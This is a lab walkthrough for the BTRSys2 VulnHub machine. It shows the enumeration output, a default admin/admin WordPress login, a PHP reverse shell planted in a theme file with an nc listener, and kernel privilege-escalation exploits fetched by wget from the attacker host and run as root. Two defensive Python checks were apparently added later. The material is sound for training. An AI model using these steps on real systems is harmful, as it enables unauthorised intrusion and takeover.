vulnhub BTRSys2 v2.1 notes
BTRSys2
The ovf file extracted from the Google Drive download did not work properly.
The ovf from the vulnhub.com download worked fine.
The VM did not get an IP address, so at boot I selected "recovery mode" and then "network Enable networking", after which the link came up.
Service enumeration
# nmap -p- 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds

# nmap -p21,22,80 -sV --version-all 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
Points of interest
- [port 21] ftp vsftpd 3.0.3
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
Details
[port 21] ftp vsftpd 3.0.3
# searchsploit vsftpd
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption              | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)              | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)              | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                             | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                      | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Nothing relevant for this version.
# ftp 10.10.10.13
Connected to 10.10.10.13.
220 (vsFTPd 3.0.3)
Name (10.10.10.13:root):
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.
Login is required, so that is it for FTP.
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
I have seen this version before; as far as I remember the only exploit available is username enumeration, and it was not very reliable.
Done.
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.13
+ Target Hostname:    10.10.10.13
+ Target Port:        80
+ Start Time:         2020-05-11 07:30:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7865 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-11 07:31:40 (GMT-4) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
robots.txt looks interesting.
# dirb http://10.10.10.13

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 11 07:32:16 2020
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:81)
==> DIRECTORY: http://10.10.10.13/javascript/
+ http://10.10.10.13/LICENSE (CODE:200|SIZE:1672)
+ http://10.10.10.13/robots.txt (CODE:200|SIZE:1451)
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.13/upload/
==> DIRECTORY: http://10.10.10.13/wordpress/

---- Entering directory: http://10.10.10.13/javascript/ ----
==> DIRECTORY: http://10.10.10.13/javascript/jquery/

---- Entering directory: http://10.10.10.13/upload/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/
==> DIRECTORY: http://10.10.10.13/upload/admins/
==> DIRECTORY: http://10.10.10.13/upload/framework/
==> DIRECTORY: http://10.10.10.13/upload/include/
+ http://10.10.10.13/upload/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/languages/
==> DIRECTORY: http://10.10.10.13/upload/media/
==> DIRECTORY: http://10.10.10.13/upload/modules/
==> DIRECTORY: http://10.10.10.13/upload/page/
==> DIRECTORY: http://10.10.10.13/upload/search/
==> DIRECTORY: http://10.10.10.13/upload/temp/
==> DIRECTORY: http://10.10.10.13/upload/templates/

---- Entering directory: http://10.10.10.13/wordpress/ ----
+ http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/
+ http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42)

---- Entering directory: http://10.10.10.13/javascript/jquery/ ----
+ http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394)

---- Entering directory: http://10.10.10.13/upload/account/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/css/
+ http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/account/templates/

---- Entering directory: http://10.10.10.13/upload/admins/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/access/
==> DIRECTORY: http://10.10.10.13/upload/admins/addons/
==> DIRECTORY: http://10.10.10.13/upload/admins/admintools/
==> DIRECTORY: http://10.10.10.13/upload/admins/groups/
+ http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/admins/interface/
==> DIRECTORY: http://10.10.10.13/upload/admins/languages/
==> DIRECTORY: http://10.10.10.13/upload/admins/login/
==> DIRECTORY: http://10.10.10.13/upload/admins/logout/
==> DIRECTORY: http://10.10.10.13/upload/admins/media/
==> DIRECTORY: http://10.10.10.13/upload/admins/modules/
==> DIRECTORY: http://10.10.10.13/upload/admins/pages/
==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/
==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/
==> DIRECTORY: http://10.10.10.13/upload/admins/service/
==> DIRECTORY: http://10.10.10.13/upload/admins/settings/
==> DIRECTORY: http://10.10.10.13/upload/admins/start/
==> DIRECTORY: http://10.10.10.13/upload/admins/support/
==> DIRECTORY: http://10.10.10.13/upload/admins/templates/
==> DIRECTORY: http://10.10.10.13/upload/admins/users/

---- Entering directory: http://10.10.10.13/upload/framework/ ----
==> DIRECTORY: http://10.10.10.13/upload/framework/functions/
+ http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/include/ ----
+ http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/

---- Entering directory: http://10.10.10.13/upload/languages/ ----
+ http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/media/ ----
+ http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/modules/ ----
+ http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/

---- Entering directory: http://10.10.10.13/upload/page/ ----
+ http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/page/posts/

---- Entering directory: http://10.10.10.13/upload/search/ ----
+ http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/temp/ ----
+ http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/temp/search/

---- Entering directory: http://10.10.10.13/upload/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/templates/blank/
+ http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ----
+ http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/
+ http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/

---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ----
+ http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/

---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/upload/account/css/ ----
+ http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/account/templates/ ----
+ http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/access/ ----
+ http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/addons/ ----
+ http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ----
+ http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/groups/ ----
+ http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/interface/ ----
+ http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/languages/ ----
+ http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/login/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/
+ http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/logout/ ----
+ http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/media/ ----
+ http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/modules/ ----
+ http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/pages/ ----
+ http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ----
+ http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ----
+ http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0)

---- Entering directory: http://10.10.10.13/upload/admins/service/ ----
+ http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/settings/ ----
+ http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/start/ ----
+ http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/support/ ----
+ http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/templates/ ----
+ http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/admins/users/ ----
+ http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/framework/functions/ ----
+ http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/include/yui/ ----
==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/
+ http://10.10.10.13/upload/include/yui/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/

---- Entering directory: http://10.10.10.13/upload/modules/news/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/
+ http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/

---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/

---- Entering directory: http://10.10.10.13/upload/page/posts/ ----
+ http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.13/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/upload/templates/blank/ ----
+ http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ----
+ http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ----
+ http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ----
+ http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ----
+ http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ----
+ http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ----
+ http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807)

---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ----
+ http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)

---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ----
+ http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ----
+ http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/
+ http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67)

---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ----
+ http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67)

-----------------
END_TIME: Mon May 11 07:34:12 2020
DOWNLOADED: 267496 - FOUND: 71
Unusually, this dirb run returned a lot of information.
The directories of interest are mainly /upload/ and /wordpress/.
First, check /robots.txt.
# curl 10.10.10.13/robots.txt
Disallow: Hackers
Allow: /wordpress/
(the rest of the file is an ASCII-art banner, not reproduced here)
Nothing new was learned from it.
Opening the home page in a browser again shows only a gif of something wriggling.
Accessing /upload/ gives:
Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'
Looks like the PHP code is failing to connect to its MySQL database?
Either way, /upload/ cannot be explored any further.
Next, check /wordpress/.
The displayed page does not seem to load the proper WordPress theme styling?
Log in, admin
Since there is a "Log in" link, try logging in with admin/admin.
Ah, that worked, so I'll edit an easily reachable PHP file from Appearance -> Editor.
It is a matter of preference, but I like putting the reverse shell into search.php because it is easy to follow.
The reverse shell is the pentestmonkey one I always rely on.
On Kali it lives at /usr/share/webshells/php/php-reverse-shell.php.
This time search.php did not trigger (by design?), so I modified comment.php for the reverse shell instead.
window 1
# nc -nlvp 8080

Then post a comment on any article from Firefox.
window 1
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 14:43:02 up  1:24,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$
Got a shell!
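The foothold above came from a default admin password plus the theme editor rewriting a template file. As an added example (not from the original post), here is a defender-side check in Python: it verifies that wp-config.php disables the built-in file editor with DISALLOW_FILE_EDIT, and it baselines the SHA-256 of every PHP file in a theme directory so a later rewrite of a file such as comment.php, or a newly dropped PHP file, shows up in a diff. The theme directory and its contents are constructed in a temporary folder; the theme name "exampletheme" is an assumption.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the
# Appearance -> Editor page that was used above to rewrite a theme file.
FILE_EDIT_RE = re.compile(
    r"""define\s*\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""",
    re.IGNORECASE,
)


def file_edit_disabled(wp_config_text: str) -> bool:
    """True if wp-config.php contains an active DISALLOW_FILE_EDIT = true."""
    for line in wp_config_text.splitlines():
        # Drop trailing // and # comments so a commented-out define does not count.
        code = line.split("//", 1)[0].split("#", 1)[0]
        if FILE_EDIT_RE.search(code):
            return True
    return False


def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(theme_dir: Path) -> dict:
    """Map each PHP file under theme_dir (relative path) to its SHA-256."""
    return {
        p.relative_to(theme_dir).as_posix(): sha256_of(p)
        for p in sorted(theme_dir.rglob("*.php"))
    }


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Compare a stored baseline against a fresh manifest of the same theme."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline a theme, then alter it the way the editor would."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "exampletheme"  # assumed name
        theme.mkdir(parents=True)
        (theme / "index.php").write_text("<?php get_header(); ?>\n")
        (theme / "comment.php").write_text("<?php // original template ?>\n")
        baseline = build_manifest(theme)
        # Simulated post-compromise state: comment.php rewritten, a new PHP file dropped.
        (theme / "comment.php").write_text("<?php /* contents replaced */ ?>\n")
        (theme / "extra.php").write_text("<?php /* new file */ ?>\n")
        return diff_manifest(baseline, build_manifest(theme))


if __name__ == "__main__":
    print(file_edit_disabled("define('DISALLOW_FILE_EDIT', true);"))
    print(demo())
```

In practice the baseline manifest is written right after a clean install or update and the diff is run from cron or a file-integrity tool; the login with admin/admin is separately addressed by the password policy.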
After getting a shell
kernel exploit
I could not find any suspicious files at all, and nothing of note in cron either.
No other option, so I went for a kernel exploit.
victim
$ uname -a
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

attacker
# searchsploit ubuntu 4.4
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation          | exploits/linux/local/41458.c
(snip)
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation       | exploits/linux/local/44298.c
These were the ones that looked likely to work.
Try 41458.c.
$ cd /tmp
$ ls
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ wget 10.10.10.3/41458.c
--2020-05-11 15:17:10--  http://10.10.10.3/41458.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/plain]
Saving to: '41458.c'

     0K .......... ......                                     100% 46.3M=0s

2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554]

$ ls
41458.c
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ gcc 41458.c
/bin/sh: 7: gcc: not found
Huh, there is no gcc.
Download a precompiled binary instead, then.
$ wget 10.10.10.3/a.out
--2020-05-11 15:18:07--  http://10.10.10.3/a.out
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23776 (23K) [application/octet-stream]
Saving to: 'a.out'

     0K .......... .......... ...                             100% 68.2M=0s

2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776]

$ chmod 777 a.out
$ ./a.out
bash: cannot set terminal process group (1374): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
Incidentally, the box kernel-panicked after this.
Maybe because I ran it from a tty.
/usr/share/exploitdb/exploits/linux/local/44298.c also gave root,
and that one did not cause a kernel panic.
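The searchsploit entry for 44298.c names a fixed build, "Linux Kernel < 4.4.0-116", while the box runs 4.4.0-62. As an added example (not from the original post), this Python snippet does the defender's version of that comparison: it parses Ubuntu-style release strings such as "4.4.0-62-generic" into upstream version plus Ubuntu ABI number, pulls the release out of a full uname -a line, and reports whether the running kernel predates the first fixed build, returning None rather than a misleading "patched" for strings it cannot parse.

```python
import re
from typing import Optional, Tuple

# Ubuntu kernel releases look like "4.4.0-62-generic": upstream version,
# then the Ubuntu ABI build number, then the flavour. Two builds of the same
# upstream 4.4.0 differ only in the ABI number, so "< 4.4.0-116" is a
# statement about that number, not about the upstream version alone.
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)(?:-[A-Za-z0-9-]+)?$")


def parse_release(release: str) -> Optional[Tuple[int, int, int, int]]:
    """Return (major, minor, patch, abi), or None for a non-Ubuntu-style string."""
    m = RELEASE_RE.match(release.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def release_from_uname(uname_a: str) -> Optional[str]:
    """Pick the release field (third token) out of a full `uname -a` line."""
    parts = uname_a.split()
    return parts[2] if len(parts) > 2 else None


def kernel_below(release: str, first_fixed: str) -> Optional[bool]:
    """True if the running release predates first_fixed, None if unparseable.

    Returning None instead of False keeps an unrecognised release string
    from being reported as already patched.
    """
    cur, fix = parse_release(release), parse_release(first_fixed)
    if cur is None or fix is None:
        return None
    return cur < fix


if __name__ == "__main__":
    # Constructed input: the uname line captured on the box above.
    line = ("Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 "
            "14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux")
    rel = release_from_uname(line)
    print(rel, "below 4.4.0-116:", kernel_below(rel, "4.4.0-116"))
```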